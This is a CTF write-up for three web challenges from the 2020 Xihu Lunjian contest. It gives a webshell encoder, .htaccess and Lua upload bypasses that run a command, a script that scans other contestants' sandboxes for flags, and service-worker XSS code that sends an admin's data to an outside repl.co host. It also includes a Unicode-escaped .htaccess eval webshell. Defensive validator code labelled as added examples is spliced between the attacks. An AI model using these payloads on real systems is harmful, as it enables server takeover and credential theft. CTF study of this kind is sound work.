2020 Xihu Lunjian (西湖论剑) CTF: partial Web writeups

Preface

At the tail end of the National Day holiday I played a round of Xihu Lunjian. The quality was quite high, so I am writing down the WPs here.

WEB

NewUpload

A newline plus an image file header is enough to get a shell. As for connecting with AntSword (蚁剑), just write a custom encoder (below), route the traffic through Burp, and globally rewrite the UA.

/**
 * php::base64 encoder
 * Create at: 2020/10/08 11:54:20
 */

'use strict';

/*
 * @param {String} pwd   connection password
 * @param {Array}  data  payload array before the encoder runs
 * @return {Array} data  payload array after the encoder runs
 */
module.exports = (pwd, data, ext = {}) => {
    // ########## write your own code below ###################
    // the code below is the PHP Base64 sample

    // generate a random variable name
    let randomID = `_0x${Math.random().toString(16).substr(2)}`;
    // the original payload is in data['_']
    // take it out, base64-encode it and store it under the randomID key
    data[randomID] = Buffer.from(data['_']).toString('base64');

    // once the shell receives the payload it first processes the content under the pwd parameter
    data[pwd] = data[randomID];

    // ########## write your own code above ###################

    // delete the original payload under _
    delete data['_'];
    // return the payload array after encoding
    return data;
}

But even with the shell, commands could not be executed: the host runs the BT (宝塔) panel. The final bypass is as follows. First upload a .htaccess:

POST /sandbox/srjn384hn4huu9t547u02efk5p/index.php HTTP/1.1
Host: upload.3b97fe.challenge.gcsis.cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------25722740783009030771590356967
Content-Length: 244
Origin: http://upload.3b97fe.challenge.gcsis.cn
Connection: close
Referer: http://upload.3b97fe.challenge.gcsis.cn/sandbox/srjn384hn4huu9t547u02efk5p/
Cookie: PHPSESSID=srjn384hn4huu9t547u02efk5p
Upgrade-Insecure-Requests: 1

-----------------------------25722740783009030771590356967
Content-Disposition: form-data; name="file"; filename=".htaccess"
Content-Type: image/png

AddHandler lua-script .lua
-----------------------------25722740783009030771590356967--

Then upload this as the last step:

require "string"

--[[
This is the default method name for Lua handlers, see the optional
function-name in the LuaMapHandler directive to choose a different
entry point.
--]]
function handle(r)
    r.content_type = "text/plain"
    r:puts("Hello Lua World!\n")
    local t = io.popen('/readflag')
    local a = t:read("*all")
    r:puts(a)
    if r.method == 'GET' then
        for k, v in pairs( r:parseargs() ) do
            r:puts( string.format("%s: %s\n", k, v) )
        end
    else
        r:puts("Unsupported HTTP method " .. r.method)
    end
end
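As an added example (not the challenge's code and not from this writeup), this is the upload gate a defender would want in front of such an endpoint: it rejects names the web server or PHP read as configuration (.htaccess, .user.ini), leading-dot and multi-extension names, extensions outside an image allowlist, and content whose magic is not at offset 0. All function names and the allowlist are this example's own assumptions.

```javascript
// Allowed image extensions with the leading bytes each one must start with.
const ALLOWED_MAGIC = {
  png: [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a],
  jpg: [0xff, 0xd8, 0xff],
  gif: [0x47, 0x49, 0x46, 0x38],
};
// Names Apache or PHP interpret as configuration rather than data.
const CONFIG_NAMES = new Set([".htaccess", ".htpasswd", ".user.ini", "web.config"]);

// Returns {ok, reason[, ext]}; bytes is a Buffer or an array of byte values.
function checkUpload(filename, bytes) {
  const name = filename.replace(/^.*[\\/]/, ""); // strip any directory part
  if (/[\x00-\x1f]/.test(name)) return { ok: false, reason: "control character in name" };
  if (name.startsWith(".") || CONFIG_NAMES.has(name.toLowerCase()))
    return { ok: false, reason: "server configuration file name" };
  const parts = name.toLowerCase().split(".");
  if (parts.length !== 2 || parts[0] === "")
    return { ok: false, reason: "exactly one extension required" };
  const ext = parts[1] === "jpeg" ? "jpg" : parts[1];
  const magic = ALLOWED_MAGIC[ext];
  if (!magic) return { ok: false, reason: "extension not allowed: " + ext };
  // The magic must sit at offset 0, so "newline + image header" fails here;
  // a magic-only check is what that trick gets past, hence the name rules above.
  if (bytes.length < magic.length || magic.some((b, i) => bytes[i] !== b))
    return { ok: false, reason: "content does not start with a ." + ext + " header" };
  return { ok: true, reason: "", ext };
}

// Constructed samples mirroring the two uploads used in the writeup.
const HTACCESS_BODY = Array.from(Buffer.from("AddHandler lua-script .lua\n"));
const PNG_HEADER = [0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0x00, 0x00];
```

An accepted image should still be re-encoded with an image library before storage, since a valid header says nothing about the rest of the file.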

Also noting down the script I prepared for "hopping on the bus" (scanning the other sandboxes for flags):

<?php
// Recursively collect every regular file under $path into $files.
function get_allfiles($path, &$files) {
    if (is_dir($path)) {
        $dp = dir($path);
        while (($file = $dp->read()) !== false) {
            if ($file != "." && $file != "..") {
                get_allfiles($path . "/" . $file, $files);
            }
        }
        $dp->close();
    }
    if (is_file($path)) {
        $files[] = $path;
    }
}

function get_filenamesbydir($dir) {
    $files = array();
    get_allfiles($dir, $files);
    return $files;
}

$filenames = get_filenamesbydir("/var/wwwroot/10.x.x.x/sandbox/");
foreach ($filenames as $value) {
    $a = file_get_contents($value);
    // "in" is not a PHP operator; strpos does the substring test
    if (strpos($a, "flag{") !== false) {
        echo $a . "<br />";
        echo $value;
    }
}

HardXSS

This challenge has some substance to it. First, there is a JSONP endpoint at https://auth.xss.eec5b2.challenge.gcsis.cn/api/loginStatus?callback=alert(1);// and an XSS at xss.xss.eec5b2.challenge.gcsis.cn/login.

Reference article: https://lightless.me/archives/XSS-With-Service-Worker.html

It matches the conditions of this challenge perfectly.

Attack flow: host the following two JS files on an HTTPS site (https://repl.it/ is recommended, it's free).

// 1.js
document.domain = "xss.eec5b2.challenge.gcsis.cn";
var iff = document.createElement('iframe');
iff.src = 'https://auth.xss.eec5b2.challenge.gcsis.cn/';
iff.addEventListener("load", function(){ iffLoadover(); });
document.body.appendChild(iff);
exp = `navigator.serviceWorker.register("/api/loginStatus?callback=importScripts('//aa.hongjunxie.repl.co/2.js')//")`;
function iffLoadover(){
    iff.contentWindow.eval(exp);
}
// 2.js
self.addEventListener('install', function(event) {
    console.log('install ok!');
});

this.addEventListener('fetch', function (event) {
    var url = event.request.clone();
    console.log('url: ', url);
    var body = "<script>location='https://aa.hongjunxie.repl.co/'+location.search;</script>";
    var init = {headers: {"Content-Type": "text/html"}};
    var res = new Response(body, init);
    event.respondWith(res.clone());
});

Submit https://xss.xss.eec5b2.challenge.gcsis.cn/login?callback=jsonp(%22//aa.hongjunxie.repl.co/1.js%22);// to admin, receive admin's password, log in and get the flag.
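As an added example (not the challenge's code and not from this writeup), here is how a JSONP endpoint like /api/loginStatus can refuse both the `alert(1);//` probe and the Service Worker registration trick: the callback must be a plain identifier path, and a request that carries the `Service-Worker: script` header (which browsers send when fetching a script for `navigator.serviceWorker.register()`) gets a 403. Function names and the `{status, headers, body}` shape are this example's own.

```javascript
// A callback may only be an identifier, optionally dotted (e.g. "app.onStatus").
// "alert(1);//" and "importScripts('//x/2.js')//" both fail this test.
const CALLBACK_RE = /^[A-Za-z_$][\w$]*(?:\.[A-Za-z_$][\w$]*)*$/;

function isSafeCallback(name) {
  return typeof name === "string" && name.length <= 64 && CALLBACK_RE.test(name);
}

// query: parsed query-string object; headers: request headers with lower-cased keys;
// data: the JSON-serialisable object the endpoint wants to return.
function buildJsonpResponse(query, headers, data) {
  const base = { "x-content-type-options": "nosniff", "cache-control": "no-store" };
  const json = { ...base, "content-type": "application/json" };

  // A service worker script fetch has no business hitting a JSONP endpoint.
  if ("service-worker" in headers) {
    return { status: 403, headers: json, body: JSON.stringify({ error: "not a service worker script" }) };
  }
  const cb = query.callback;
  if (cb === undefined) {
    return { status: 200, headers: json, body: JSON.stringify(data) };
  }
  if (!isSafeCallback(cb)) {
    return { status: 400, headers: json, body: JSON.stringify({ error: "invalid callback" }) };
  }
  // Leading "/**/" keeps the response from starting with attacker-chosen bytes.
  return {
    status: 200,
    headers: { ...base, "content-type": "application/javascript" },
    body: `/**/${cb}(${JSON.stringify(data)});`,
  };
}
```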

EasyJson

Use Unicode escapes to bypass the filter and write a self-including webshell into .htaccess: php_value auto_prepend_fi\le .htaccess#<?php eval($_POST[1])?># \ (the trailing backslash comments out the next line). Then getshell and readflag.

POST /?action=write&filename=.htaccess&source=123 HTTP/1.1
Host: easyjson.c4b1d2.challenge.gcsis.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie:
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 475


{"\u0063\u006f\u006e\u0074\u0065\u006e\u0074":"\u0070\u0068\u0070\u005f\u0076\u0061\u006c\u0075\u0065\u0020\u0061\u0075\u0074\u006f\u005f\u0070\u0072\u0065\u0070\u0065\u006e\u0064\u005f\u0066\u0069\u005c\u000d\u000a\u006c\u0065\u0020\u002e\u0068\u0074\u0061\u0063\u0063\u0065\u0073\u0073\u000d\u000a\u0023\u003c\u003f\u0070\u0068\u0070\u0020\u0065\u0076\u0061\u006c\u0028\u0024\u005f\u0050\u004f\u0053\u0054\u005b\u0031\u005d\u0029\u003f\u003e\u000d\u000a\u0023\u0020\u005c"}
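As an added example (not the challenge's own code), this is a write handler that runs its checks after JSON decoding and after joining Apache's backslash line continuations, which is exactly the layer the `\uXXXX` escapes and the `fi\` split get past. The function names and the forbidden-directive list are assumptions of this example.

```javascript
// Names and directives a user-controlled file write must never produce (assumed policy).
const FORBIDDEN_NAMES = new Set([".htaccess", ".user.ini", "php.ini"]);
const FORBIDDEN_DIRECTIVES = [
  /\bphp_(value|flag|admin_value|admin_flag)\b/i,
  /\b(Add|Set)Handler\b/i,
  /<\?/,
];

// Apache joins a line ending in a backslash with the next one before it parses
// directives, so "fi\<newline>le" is read as "file". Do the same before checking.
function joinContinuations(text) {
  return text.replace(/\\\r?\n/g, "");
}

// Decide whether a write request is acceptable. Returns {ok, reason}.
function checkWriteRequest(filename, rawBody) {
  const base = filename.replace(/^.*[\\/]/, "").toLowerCase();
  if (base.startsWith(".") || FORBIDDEN_NAMES.has(base)) {
    return { ok: false, reason: "server config file name: " + base };
  }
  let parsed;
  try { parsed = JSON.parse(rawBody); } catch (e) { return { ok: false, reason: "invalid JSON" }; }
  if (typeof parsed.content !== "string") return { ok: false, reason: "missing content" };
  const canonical = joinContinuations(parsed.content);
  for (const re of FORBIDDEN_DIRECTIVES) {
    if (re.test(canonical)) return { ok: false, reason: "forbidden directive: " + re.source };
  }
  return { ok: true, reason: "" };
}

// Reproduces the encoding used above so the check can be exercised offline:
// every character becomes a \uXXXX escape, which JSON still decodes normally.
function escapeAllChars(s) {
  return Array.from(s, ch => "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0")).join("");
}

// Constructed sample: the same .htaccess content the request above carries, fully escaped.
const PAYLOAD = "php_value auto_prepend_fi\\\r\nle .htaccess\r\n#<?php eval($_POST[1])?>\r\n# \\";
const ESCAPED_BODY = '{"' + escapeAllChars("content") + '":"' + escapeAllChars(PAYLOAD) + '"}';

// A keyword filter on the raw body is what the escapes defeat.
function naiveFilterMatches(rawBody) {
  return /php_value|<\?php/i.test(rawBody);
}
```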

End

Go easy on us in the finals; see you all in Hangzhou.